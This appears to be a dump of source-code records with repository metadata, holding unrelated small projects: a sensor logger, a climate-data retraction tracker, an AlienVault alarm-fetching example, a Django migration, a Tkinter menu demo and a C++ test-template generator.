_matrix[:-number, :] = matrix[:-number, :]
return _matrix
def _rows_number(matrix):
return matrix.shape[0]
def _cols_number(matrix):
return matrix.shape[1]
class SchemeToNodesDistributor(object):
def __init__(self, nodes):
self._distributor = WeightsDistributor(nodes)
def __call__(self, scheme):
return scheme.distribute(self._distributor)
class WeightsDistributor(object):
def __init__(self, nodes):
self._distributor = create_weights_distributor(
create_close_point_finder(nodes)
)
def __call__(self, point, weight):
return self._distributor(point, weight) | 30.5 | 119 | 0.709389 | 530 | 4,026 | 5.00566 | 0.15283 | 0.081417 | 0.047493 | 0.036185 | 0.480211 | 0.356201 | 0.257067 | 0.159065 | 0.159065 | 0.159065 | 0 | 0.00186 | 0.198957 | 4,026 | 132 | 120 | 30.5 | 0.820775 | 0 | 0 | 0.134831 | 0 | 0 | 0.031289 | 0 | 0 | 0 | 0 | 0 | 0.022472 | 1 | 0.202247 | false | 0 | 0.022472 | 0.067416 | 0.404494 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69d3674b80e0407aa5556ee4e06d257e26cbc733 | 1,058 | py | Python | dht22.py | trihatmaja/dht22-raspi | 7bce4b1c35d9eed9e4913caa6f3b9b3aed5c3219 | [
"MIT"
] | null | null | null | dht22.py | trihatmaja/dht22-raspi | 7bce4b1c35d9eed9e4913caa6f3b9b3aed5c3219 | [
"MIT"
] | null | null | null | dht22.py | trihatmaja/dht22-raspi | 7bce4b1c35d9eed9e4913caa6f3b9b3aed5c3219 | [
"MIT"
] | null | null | null | import Adafruit_DHT as dht
import time
from influxdb import InfluxDBClient
def get_serial():
cpu_serial = "0000000000000000"
try:
f = open('/proc/cpuinfo', 'r')
for line in f:
if line[0:6] == 'Serial':
cpu_serial = line[10:26]
f.close()
except:
cpu_serial = "ERROR000000000"
return cpu_serial
def write_db(tmp, hum, device_id):
json_body = [
{
"measurement": "temperature",
"tags": {
"device_id": str(device_id),
},
"fields": {
"celcius": str('{0:0.2f}'.format(tmp)),
"humidity": str('{0:0.2f}'.format(hum)),
}
}
]
client = InfluxDBClient('localhost', 8086, "", "", "raspi_temp")
client.write_points(json_body)
def main():
device_id = get_serial()
while True:
h,t = dht.read_retry(dht.DHT22, 4)
write_db(t, h, device_id)
print ('Temp={0:0.2f}*C Humidity={1:0.2f}%'.format(t, h))
time.sleep(5)
if __name__ == '__main__':
main()
| 23.511111 | 66 | 0.535917 | 131 | 1,058 | 4.122137 | 0.526718 | 0.074074 | 0.022222 | 0.025926 | 0.048148 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069577 | 0.307183 | 1,058 | 44 | 67 | 24.045455 | 0.667121 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.078947 | null | null | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69e260f9ca6210cf18c090c8a49bc65255c0f206 | 856 | py | Python | 03-datatypes/examples/07-tuples.py | luxwarp/python-course | d6ec4961ef43bd9d99954cffaea837220638e83f | [
"0BSD"
] | null | null | null | 03-datatypes/examples/07-tuples.py | luxwarp/python-course | d6ec4961ef43bd9d99954cffaea837220638e83f | [
"0BSD"
] | null | null | null | 03-datatypes/examples/07-tuples.py | luxwarp/python-course | d6ec4961ef43bd9d99954cffaea837220638e83f | [
"0BSD"
] | null | null | null | #!/usr/bin/env python3
# tuples is a type of list.
# tuples is immutable.
# the structure of a tuple: (1, "nice work", 2.3, [1,2,"hey"])
my_tuple = ("hey", 1, 2, "hey ho!", "hey", "hey")
print("My tuple:", my_tuple)
# to get a tuple value use it's index
print("Second item in my_tuple:", my_tuple[1])
# to count how many times a values appears in a tuple: tuple.count(value)
# returns 0 if no values exists.
print("How many 'hey' in my_tuple:", my_tuple.count("hey"))
# go get the index value of a tuple item. tuple.index(value)
# if value does not exist you will get an error like "ValueError: tuple.index(x): x not in tuple"
print("Index position of 'hey ho!' in my_tuple:", my_tuple.index("hey ho!"))
# tuples are immutable so you cannot reassign a value like
# my_tuple[2] = "wop wop"
# TypeError: 'tuple' object does not support item assignment
| 35.666667 | 97 | 0.693925 | 157 | 856 | 3.726115 | 0.414013 | 0.119658 | 0.061538 | 0.095727 | 0.082051 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015471 | 0.169393 | 856 | 23 | 98 | 37.217391 | 0.807314 | 0.65771 | 0 | 0 | 0 | 0 | 0.448399 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.8 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
69e2f9e47e947283eba6f71f70baad174d0962cb | 7,048 | py | Python | retraction_synda.py | meteorologist15/synda_retraction | 4a9174d2bc5d3573b5cdd39636380607120d586c | [
"CC0-1.0"
] | null | null | null | retraction_synda.py | meteorologist15/synda_retraction | 4a9174d2bc5d3573b5cdd39636380607120d586c | [
"CC0-1.0"
] | null | null | null | retraction_synda.py | meteorologist15/synda_retraction | 4a9174d2bc5d3573b5cdd39636380607120d586c | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/env python3
import subprocess
import requests
import json
import os
import re
import argparse
import logging
import csv
import shutil
retracted_exps = "retracted_exps.csv" #Generic info list from file here.
logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
handle_api = "https://hdl.handle.net/api/handles/"
def get_tracking_ids(pid):
# All pid's begin with 'hdl:'. Start at index 4 for api
pid = pid[4:]
web_output = requests.get(handle_api + pid)
json_output = web_output.json()
tracking_ids = json_output['values'][4]['data']['value'] # A semicolon-separated string is returned
return tracking_ids
def set_synda_path():
synda_home = "/path/to/synda/sdt"
synda_execdir = synda_home + "/bin:"
if not os.getenv("ST_HOME", default=0):
os.environ["ST_HOME"] = synda_home
if not synda_execdir in os.getenv("PATH"):
os.environ["PATH"] = synda_execdir + os.getenv("PATH")
def write_pid_json(retraction_list):
pid_file = "pid_retractions.csv"
success_count = 0
failure_count = 0
with open(pid_file, 'ab') as f:
for line in retraction_list:
# Dump metadata for each dataset using Synda to retrieve the PID
meta_cmd = ["synda", "dump", line.rstrip("\n")]
meta_dump = subprocess.run(meta_cmd, stdout=subprocess.PIPE)
meta_json = meta_dump.stdout.decode("utf-8")
if len(meta_json) > 0:
meta_json = json.loads(meta_json)
try:
pid_output = meta_json[0]["pid"]
except (IndexError, KeyError) as err:
logging.error("Problems reading JSON. Skipping.\n%s\n" % err)
failure_count += 1
continue
tracking_ids = get_tracking_ids(pid_output)
# Write the dataset PID, dataset ID, and semicolon separated tracking_id's to file
final_output_line = "%s,%s,%s\n" % (pid_output, line.replace("\n", ""), tracking_ids)
f.write(bytes(final_output_line, "UTF-8"))
success_count += 1
logging.info("%s/%s dataset pid's written" % (str(success_count), str(len(retraction_list))))
else:
logging.warning("The dataset %s was not processed. Did not find metadata dump from Synda. Skipping." % line)
class Retractor(object):
def __init__(self, institutions=None, project=None):
self.project = "CMIP6" if project is None else ','.join(project)
def clean_list(self, synda_search):
# Some preprocess cleaning here #
for i in range(len(synda_search)):
synda_search[i] = re.search('[A-Z].*', synda_search[i]).group() + "\n"
return synda_search
def finalize_list(self, search_command):
search_proc = subprocess.run(search_command, stdout=subprocess.PIPE)
search_output = search_proc.stdout.decode("utf-8").splitlines()
retract_list = self.clean_list(search_output) # Without the extra text in the beginning
return retract_list
def get_processed_retractions(self):
# This is if you have run the script before. pid_retractions.csv is an already completed set of retractions, i.e. already "processed". Read this into memory for eventual comparison with new retraction list.
pid_retracted_file = "pid_retractions.csv"
already_processed = []
if os.path.exists(pid_retracted_file):
with open(pid_retracted_file, 'r') as f:
already_processed = f.readlines()
return already_processed
def refine_list(self, retraction_list):
# Compare with those already processed from beforehand/previous as retracted. This cancels out some redundancy.
processed_list = self.get_processed_retractions()
for line in processed_list:
comparison = re.search(',(.*),', line).group(1) + "\n"
if comparison in retraction_list:
try:
retraction_list.remove(comparison)
except ValueError as err:
logging.warning("Something went terribly wrong. Skipping.")
continue
return retraction_list
def get_retraction_list(self):
main_list = []
memory_list = []
# Read generic retraction info into memory
try:
with open(retracted_exps, newline='') as f:
esgf_reader = csv.reader(f, quotechar='|', quoting=csv.QUOTE_MINIMAL)
for row in esgf_reader:
memory_list.append(row)
except OSError as e:
logging.error("The file %s doesn't exist. Quitting." % retracted_exps)
raise
# Use Synda to search by experiment_id, refine the list, and add continually add retractions to main list
for sublist in memory_list:
search_cmd = ["synda", "search", "project=CMIP6", "retracted=true", "experiment_id=%s" % sublist[0], "-l", "8999"]
if sublist[2] == 'no_overflow':
logging.info("Getting data from experiment %s" % sublist[0])
refined_list = self.refine_list(self.finalize_list(search_cmd))
if len(refined_list) > 0:
main_list.extend(refined_list)
logging.info("Added %s entries from this experiment. Total to add: %s" % (str(len(refined_list)), str(len(main_list))))
else:
logging.info("No entries to add for this experiment")
# Execute searches using variant label instead of simply experiment_id if retractions >= 9000
else:
logging.info("Getting data from experiment %s. Over 9000 retractions." % sublist[0])
ensemble_dict = json.loads(sublist[2].replace('|', ','))
for variant_label in ensemble_dict.keys():
logging.info("Getting data from variant label (ensemble) %s" % variant_label)
search_cmd = ["synda", "search", "project=CMIP6", "retracted=true", "experiment_id=%s" % sublist[0], "variant_label=%s" % variant_label, "-l", "8999"]
refined_list = self.refine_list(self.finalize_list(search_cmd))
if len(refined_list) > 0:
main_list.extend(refined_list)
logging.info("Added %s entries from this variant_label. Total to add: %s" % (str(len(refined_list)), str(len(main_list))))
else:
logging.info("No entries to add for this variant_label")
return main_list # These are the retractions we care to add
if __name__ == "__main__":
set_synda_path()
logging.info("Creating PID backup...")
shutil.copy2("pid_retractions.csv", "pid_retractions.csv.prev")
ret = Retractor()
myretractlist = ret.get_retraction_list()
write_pid_json(myretractlist)
| 36.518135 | 214 | 0.614784 | 876 | 7,048 | 4.76484 | 0.27968 | 0.026354 | 0.020364 | 0.015812 | 0.152372 | 0.146143 | 0.146143 | 0.128414 | 0.128414 | 0.128414 | 0 | 0.008488 | 0.281215 | 7,048 | 192 | 215 | 36.708333 | 0.815436 | 0.135783 | 0 | 0.125 | 0 | 0 | 0.167051 | 0.00395 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.075 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69e3ad1eebd1e1fccdf1e001090572086c5c45ba | 366 | py | Python | theboss/network_simulation_strategy/network_simulation_strategy.py | Tomev/BoSS | 45db090345650741c85b39b47cbc7b391d6daa33 | [
"Apache-2.0"
] | null | null | null | theboss/network_simulation_strategy/network_simulation_strategy.py | Tomev/BoSS | 45db090345650741c85b39b47cbc7b391d6daa33 | [
"Apache-2.0"
] | 4 | 2020-07-10T00:28:43.000Z | 2020-10-12T11:51:38.000Z | theboss/network_simulation_strategy/network_simulation_strategy.py | Tomev/BoSS | 45db090345650741c85b39b47cbc7b391d6daa33 | [
"Apache-2.0"
] | 1 | 2020-09-12T15:35:09.000Z | 2020-09-12T15:35:09.000Z | __author__ = "Tomasz Rybotycki"
import abc
from numpy import ndarray
class NetworkSimulationStrategy(abc.ABC):
@classmethod
def __subclasshook__(cls, subclass):
return hasattr(subclass, "simulate") and callable(subclass.simulate)
@abc.abstractmethod
def simulate(self, input_state: ndarray) -> ndarray:
raise NotImplementedError
| 22.875 | 76 | 0.737705 | 37 | 366 | 7.054054 | 0.702703 | 0.122605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18306 | 366 | 15 | 77 | 24.4 | 0.87291 | 0 | 0 | 0 | 0 | 0 | 0.065574 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.1 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
69e3ea4c1c7c901fc078c30d615b40492cfe71fd | 769 | py | Python | ecommerce/core/migrations/0020_auto_20200923_1948.py | berrondo/ecommerce | daa0fa3c336d7e1e9816cc187f858bab7122fb1b | [
"MIT"
] | 1 | 2020-09-04T02:23:02.000Z | 2020-09-04T02:23:02.000Z | ecommerce/core/migrations/0020_auto_20200923_1948.py | berrondo/ecommerce | daa0fa3c336d7e1e9816cc187f858bab7122fb1b | [
"MIT"
] | null | null | null | ecommerce/core/migrations/0020_auto_20200923_1948.py | berrondo/ecommerce | daa0fa3c336d7e1e9816cc187f858bab7122fb1b | [
"MIT"
] | null | null | null | # Generated by Django 3.1.1 on 2020-09-23 19:48
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0019_auto_20200923_1942'),
]
operations = [
migrations.AlterField(
model_name='orderitem',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='core.order', verbose_name='pedido'),
),
migrations.AlterField(
model_name='orderitem',
name='product',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='order_item', to='core.product', verbose_name='produto'),
),
]
| 30.76 | 151 | 0.642393 | 87 | 769 | 5.54023 | 0.494253 | 0.06639 | 0.087137 | 0.136929 | 0.460581 | 0.460581 | 0.286307 | 0.286307 | 0.286307 | 0.286307 | 0 | 0.052277 | 0.228869 | 769 | 24 | 152 | 32.041667 | 0.76054 | 0.058518 | 0 | 0.333333 | 1 | 0 | 0.148199 | 0.031856 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69e536b2f665710fad652d1507cbb967f6b032a2 | 1,989 | py | Python | framework.py | w1rtp/USMAnywhereAPI | d239fde894e085cfe5350800225ebe88297f922f | [
"MIT"
] | 3 | 2019-02-04T18:15:00.000Z | 2021-06-22T21:03:22.000Z | framework.py | w1rtp/USMAnywhereAPI | d239fde894e085cfe5350800225ebe88297f922f | [
"MIT"
] | 1 | 2018-10-04T21:51:50.000Z | 2018-10-06T18:17:00.000Z | framework.py | w1rtp/USMAnywhereAPI | d239fde894e085cfe5350800225ebe88297f922f | [
"MIT"
] | 2 | 2019-12-23T16:03:01.000Z | 2022-03-17T01:13:17.000Z | #!/usr/bin/env python
"""
Nicholas' Example API code for interacting with Alienvault API.
This is just Example code written by NMA.IO.
There isn't really much you can do with the API just yet, so
this will be a work in progress.
Grab your API key here:
https://www.alienvault.com/documentation/usm-anywhere/api/alienvault-api.htm?cshid=1182
That said, you could use this to write an alerter bot.
* Note, this isn't an SDK, just some example code to get people started...
"""
# import json # uncomment if you want pretty printing.
import base64
import requests
URL = "alienvault.cloud/api/2.0"
HOST = "" # put your subdomain here.
def Auth(apiuser, apikey):
"""Our Authentication Code.
:params apiuser
:params apikey
:returns oauth_token
"""
headers = {"Authorization": "Basic {}".format(base64.b64encode("%s:%s" % (apiuser, apikey)))}
r = requests.post("https://{}.{}/oauth/token?grant_type=client_credentials".format(HOST, URL), headers=headers)
if r.status_code is 200:
return r.json()["access_token"]
else:
print("Authentication failed. Check username/Password")
exit(1)
def Alarms(token):
"""Pull Alarms from the API Console."""
headers = {"Authorization": "Bearer {}".format(token)}
r = requests.get("https://{}.{}/alarms/?page=1&size=20&suppressed=false&status=open".format(HOST, URL), headers=headers)
if r.status_code is not 200:
print("Something went wrong. \n{}".format(r.content))
exit(1)
else: return (r.json())
def Events():
"""Nothing yet."""
pass
if __name__ == "__main__":
print("Simple API Integration with Alienvault USM Anywhere - 2018 NMA.IO")
token = Auth("username", "password")
jdata = Alarms(token)
for item in jdata["_embedded"]["alarms"]:
# print(json.dumps(item, indent=2)) # uncomment if you want a pretty version of the whole block.
print(item["rule_method"] + ": " + " ".join(item["alarm_sources"]))
| 31.078125 | 124 | 0.667672 | 278 | 1,989 | 4.715827 | 0.55036 | 0.021358 | 0.021358 | 0.02746 | 0.064073 | 0.064073 | 0.064073 | 0.064073 | 0.064073 | 0.064073 | 0 | 0.01737 | 0.189542 | 1,989 | 63 | 125 | 31.571429 | 0.795906 | 0.388135 | 0 | 0.074074 | 0 | 0 | 0.347566 | 0.020495 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.111111 | 0.074074 | 0 | 0.222222 | 0.148148 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
69e81c899520bdfc0aa12c011c27b56eb5e31e55 | 2,477 | py | Python | gen_files.py | qbosen/leetcode_file_generator | 594d7bb1e5ac5cb3100ddbaecc3f8359c17dbbb8 | [
"MIT"
] | null | null | null | gen_files.py | qbosen/leetcode_file_generator | 594d7bb1e5ac5cb3100ddbaecc3f8359c17dbbb8 | [
"MIT"
] | null | null | null | gen_files.py | qbosen/leetcode_file_generator | 594d7bb1e5ac5cb3100ddbaecc3f8359c17dbbb8 | [
"MIT"
] | null | null | null | # coding=utf-8
# /usr/bin/python gen_files.py 100
import os
import sys
import time
from settings import *
from settings_advanced import *
try:
import cPickle as pickle
except ImportError:
import pickle
from content_parser import DescriptionParser
from content_parser_advance import AdvancedDescriptionParser
def main():
num = sys.argv[1] if len(sys.argv) > 1 else '11'
level = sys.argv[2] if len(sys.argv) > 2 else None
level = int(level) if level else default_format
if not num:
return
info = get_info(num)
package_path = make_dir(info)
en_level = get_level(info)
date = time.strftime('%Y/%m/%d', time.localtime())
if not enable_advance:
dp = DescriptionParser().parse(info['path'])
md = md_pattern.format(title=dp.title, content=dp.content, date=date, **info)
solution = class_pattern.format(en_level=en_level, author=author, date=date, **info)
test = test_class_pattern.format(en_level=en_level, author=author, date=date, **info)
else:
dp = AdvancedDescriptionParser().parse(info['path'], level)
dp_data = dp.data
# print dp_data
md = ad_md_pattern.format(date=date, **dp_data)
solution = ad_class_pattern.format(en_level=en_level, author=author, date=date, **dp_data)
test = ad_test_class_pattern.format(en_level=en_level, author=author, date=date, **dp_data)
generate_file(package_path, 'README.md', md)
file_suffix = language_map[language] if language in language_map else '.java'
generate_file(package_path, 'Solution%s' % file_suffix, solution)
generate_file(package_path, 'SolutionTest%s' % file_suffix, test)
def get_info(num):
dic = pickle.load(open('dumps.txt', 'r'))
return dic[num] if num in dic else {}
def generate_file(base_path, file_name, content):
full_path = os.path.join(base_path, file_name)
with open(full_path, 'w') as f:
f.write(content.encode('utf-8'))
print 'create file: %s' % full_path
def get_level(info_dict):
ch_level = info_dict['level']
level_map = {'简单': 'easy', '中等': 'medium', '困难': 'hard'}
return level_map[ch_level] if ch_level in level_map else 'default'
def make_dir(info_dict):
level = get_level(info_dict)
base_path = os.path.join(src_path, level, 'q{:0>3s}'.format(info_dict['index']))
if not os.path.exists(base_path):
os.makedirs(base_path)
return base_path
if __name__ == '__main__':
main()
| 31.75641 | 99 | 0.686314 | 370 | 2,477 | 4.37027 | 0.302703 | 0.038961 | 0.044527 | 0.049474 | 0.145949 | 0.145949 | 0.145949 | 0.145949 | 0.145949 | 0.145949 | 0 | 0.006471 | 0.188938 | 2,477 | 77 | 100 | 32.168831 | 0.798407 | 0.023819 | 0 | 0 | 0 | 0 | 0.057995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.178571 | null | null | 0.017857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69e933da38595f381a40d626b00d56311127794d | 1,287 | py | Python | interface/exemplos1/05.py | ell3a/estudos-python | 09808a462aa3e73ad433501acb11f62217548af8 | [
"MIT"
] | null | null | null | interface/exemplos1/05.py | ell3a/estudos-python | 09808a462aa3e73ad433501acb11f62217548af8 | [
"MIT"
] | null | null | null | interface/exemplos1/05.py | ell3a/estudos-python | 09808a462aa3e73ad433501acb11f62217548af8 | [
"MIT"
] | null | null | null | from tkinter import *
import tkFileDialog
root = Tk()
menubar = Menu(root)
root.config(menu=menubar)
root.title('Tk Menu')
root.geometry('150x150')
filemenu = Menu(menubar)
filemenu2 = Menu(menubar)
filemenu3 = Menu(menubar)
menubar.add_cascade(label='Arquivo', menu=filemenu)
menubar.add_cascade(label='Cores', menu=filemenu2)
menubar.add_cascade(label='Ajuda', menu=filemenu3)
def Open(): tkFileDialog.askopenfilename()
def Save(): tkFileDialog.asksaveasfilename()
def Quit(): root.destroy()
def ColorBlue(): Text(background='blue').pack()
def ColorRed(): Text(background='red').pack()
def ColorBlack(): Text(background='black').pack()
def Help():
text = Text(root)
text.pack();
text.insert('insert', 'Ao clicar no botão da\n'
'respectiva cor, o fundo da tela\n'
'aparecerá na cor escolhida.')
filemenu.add_command(label='Abrir...', command=Open)
filemenu.add_command(label='Salvar como...', command=Save)
filemenu.add_separator()
filemenu.add_command(label='Sair', command=Quit)
filemenu2.add_command(label='Azul', command=ColorBlue)
filemenu2.add_command(label='Vermelho', command=ColorRed)
filemenu2.add_command(label='Preto', command=ColorBlack)
filemenu3.add_command(label='Ajuda', command=Help)
root.mainloop() | 33 | 61 | 0.724165 | 163 | 1,287 | 5.650307 | 0.386503 | 0.076004 | 0.114007 | 0.071661 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012378 | 0.121212 | 1,287 | 39 | 62 | 33 | 0.801945 | 0 | 0 | 0 | 0 | 0 | 0.139752 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205882 | false | 0 | 0.058824 | 0 | 0.264706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69e9b7f3b724fc8a84cb33e494ceb8bad87452a5 | 349 | py | Python | public/models.py | level09/yooo | deb8fbdd2d2114a9189e35ee5ab6014876f99438 | [
"MIT"
] | 6 | 2015-02-20T17:24:46.000Z | 2020-05-21T18:23:25.000Z | public/models.py | level09/yooo | deb8fbdd2d2114a9189e35ee5ab6014876f99438 | [
"MIT"
] | null | null | null | public/models.py | level09/yooo | deb8fbdd2d2114a9189e35ee5ab6014876f99438 | [
"MIT"
] | null | null | null | from extensions import db
import datetime
import json
class Link(db.Document):
lid = db.SequenceField(unique=True)
longUrl = db.StringField()
shortUrl = db.StringField()
date_submitted = db.DateTimeField(default=datetime.datetime.now)
usage = db.IntField(default=0)
def __unicode__(self):
return '%s' % self.longUrl | 26.846154 | 68 | 0.710602 | 43 | 349 | 5.651163 | 0.674419 | 0.106996 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003509 | 0.183381 | 349 | 13 | 69 | 26.846154 | 0.849123 | 0 | 0 | 0 | 0 | 0 | 0.005714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.272727 | 0.090909 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
69ea5b5cea2f3bde949a1ce25fc96a75ca9f7638 | 6,132 | py | Python | script/python/lib/exhaust_generation/exhaustive_tpls.py | timblechmann/nt2 | 6c71f7063ca4e5975c9c019877e6b2fe07c9e4ce | [
"BSL-1.0"
] | 2 | 2016-09-14T00:23:53.000Z | 2018-01-14T12:51:18.000Z | script/python/lib/exhaust_generation/exhaustive_tpls.py | timblechmann/nt2 | 6c71f7063ca4e5975c9c019877e6b2fe07c9e4ce | [
"BSL-1.0"
] | null | null | null | script/python/lib/exhaust_generation/exhaustive_tpls.py | timblechmann/nt2 | 6c71f7063ca4e5975c9c019877e6b2fe07c9e4ce | [
"BSL-1.0"
] | null | null | null | #! /usr/bin/env python
# -*- coding: iso-8859-15 -*-
##############################################################################
# Copyright 2003 & onward LASMEA UMR 6602 CNRS/Univ. Clermont II
# Copyright 2009 & onward LRI UMR 8623 CNRS/Univ Paris Sud XI
#
# Distributed under the Boost Software License, Version 1.0
# See accompanying file LICENSE.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt
##############################################################################
"""generation of an exhaustive test unit
"""
__author__ = "Lapreste Jean-thierry (lapreste@univ-bpclermont.fr)"
__version__ = "$Revision: 1.0 $"
__date__ = "$Date: 2011 $"
__copyright__ = "Lapreste Jean-thierry"
__license__ = "Boost Software License, Version 1.0"
class Exhaustive_data(object) :
Tpl = {
'scalar' : {
},
'simd' : {
'global_header_txt' : '\n'.join([
'////////////////////////////////////////////////////////////////////////',
'// exhaustive test in simd mode for functor $prefix$::$name$',
'////////////////////////////////////////////////////////////////////////',
'#include <nt2/include/functions/$name$.hpp>',
'',
'#include <nt2/include/functions/iround.hpp>',
'#include <nt2/include/functions/load.hpp>',
'#include <nt2/include/functions/min.hpp>',
'#include <nt2/include/functions/splat.hpp>',
'#include <nt2/include/functions/successor.hpp>',
'#include <nt2/include/functions/ulpdist.hpp>',
'',
'#include <nt2/include/constants/real.hpp>',
'',
'#include <nt2/sdk/meta/cardinal_of.hpp>',
'#include <nt2/sdk/meta/as_integer.hpp>',
'',
'#include <iostream>',
'',
'typedef BOOST_SIMD_DEFAULT_EXTENSION ext_t;',
]),
'typ_repfunc_txt' : '\n'.join([
'static inline ',
'typename nt2::meta::call<nt2::tag::$name$_($typ$)>::type',
'repfunc(const $typ$ & a0)',
'{',
' return $repfunc$;',
'}',
]),
'test_func_forwarding_txt' : '\n'.join([
'template <class T>',
'void exhaust_test_$name$(const T& mini,const T& maxi);'
]),
'test_func_call_txt' : '\n'.join([
' exhaust_test_$name$($mini$,$maxi$);'
]),
'main_beg_txt' : '\n'.join([
'int main(){',
'{',
]),
'main_end_txt' : '\n'.join([
' return 0;',
'}',
'',
]),
'test_func_typ_txt' : '\n'.join([
'template <>',
'void exhaust_test_$name$<$typ$>(const $typ$& mini,const $typ$& maxi)',
' {',
' typedef boost::simd::native<$typ$,ext_t> n_t;',
' typedef typename nt2::meta::as_integer<n_t>::type in_t;',
' typedef typename nt2::meta::call<nt2::tag::$name$_($typ$)>::type r_t;',
' typedef typename nt2::meta::call<nt2::tag::$name$_(n_t)>::type r_t;',
' $typ$ mini = $mini$;',
' $typ$ maxi = $maxi$;',
' const nt2::uint32_t N = nt2::meta::cardinal_of<n_t>::value;',
' const in_t vN = nt2::splat<in_t>(N);',
' const nt2::uint32_t M = 10;',
' nt2::uint32_t histo[M+1];',
' for(nt2::uint32_t i = 0; i < M; i++) histo[i] = 0;',
' float a[N];',
' a[0] = mini;',
' for(nt2::uint32_t i = 1; i < N; i++)',
' a[i] = nt2::successor(a[i-1], 1);',
' n_t a0 = nt2::load<n_t>(&a[0],0);',
' nt2::uint32_t k = 0,j = 0;',
' std::cout << "a line of points to wait for... be patient!" << std::endl;',
' for(; a0[N-1] < maxi; a0 = nt2::successor(a0, vN))',
' {',
' n_t z = nt2::$name$(a0);',
' for(nt2::uint32_t i = 0; i < N; i++)',
' {',
' float v = repfunc(a0[i]);',
' float sz = z[i];',
' ++histo[nt2::min(M, nt2::iround(2*nt2::ulpdist(v, sz)))];',
' ++k;',
' if (k%100000000 == 0){',
' std::cout << "." << std::flush; ++j;',
' if (j == 80){std::cout << std::endl; j = 0;}',
' }',
' }',
' }',
' std::cout << "exhaustive test for " << std::endl;',
' std::cout << " nt2::$name$ versus $repfunc$ " << std::endl;',
' std::cout << " in $mode$ mode and $typ$ type" << std::endl;',
' for(nt2::uint32_t i = 0; i < M; i++)',
' std::cout << i/2.0 << " -> " << histo[i] << std::endl;',
' std::cout << k << " values computed" << std::endl;',
' std::cout << std::endl;',
